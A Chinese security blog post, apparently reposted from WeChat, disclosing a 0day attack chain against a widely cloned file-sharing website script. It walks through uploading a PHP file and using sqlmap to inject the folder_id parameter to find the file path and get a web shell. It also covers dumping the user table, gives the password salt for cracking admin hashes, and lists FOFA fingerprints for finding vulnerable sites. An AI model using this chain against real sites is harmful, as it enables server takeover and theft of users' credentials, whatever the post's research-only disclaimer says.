0x01 前言🤚
首先 祝大家2024新年快乐 一路发发发 0day挖挖挖
最近比较忙 也很少发文章 有空了就给大家更新注意:本文仅限于技术探讨,思路探讨,禁止进行未授权等违法操作
0x02 仿蓝奏网盘(城通)🎉0day🎉
这个网盘相信大家都很熟悉 经常逛源码站的朋友都知道
这套源码有很多个名字 (仿蓝奏云网盘、城通网盘、闪客网盘系统)名字多,皮肤也多,但是漏洞基本通用
0x03 话不多说直接开始💥
前台注册个账号-登录
0x04 上传👆
直接上传一个php文件
0x05 注入点 💉组合拳
思路:
通过SQL注入拿到绝对路径 拼接GetShell 经过审计 folder_id 存在注入
注入点:
http://192.168.0.122/file/list?&folder_id=0&search=&rows=20&page=1
sqlmap.py -r 1.txt -p folder_id --dbs 登录后带上cookie注入
0x06 爆破路径🖕
刚刚上面登陆后上传的php 是没有直接返回路径的 得通过 SQL注入 去数据库查看返回路径
origin_name是我们上传文件的名字
file_name 是 文件在服务器的路径
0x07 Getshell✅
把路径和域名拼凑 成功Getshell
0x08 限制条件getshell⭕️
思路:
如果后台做了策略 无法前台上传php文件的
可以通过注入进后台 开启php上传即可
sqlmap.py -r 1.txt -p folder_id -D 库名 -T sk_users --dump
密码是加了盐的 通过拼接盐解密 MD5:tbg-sk-pan-ver-1-1-0
0x09 FOFA指纹
"assets/picture/header-mobile.png"
"/assets/static/index/css/share-style.css"
原文始发于微信公众号(安全社):仿蓝奏网盘(城通)-0day-
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论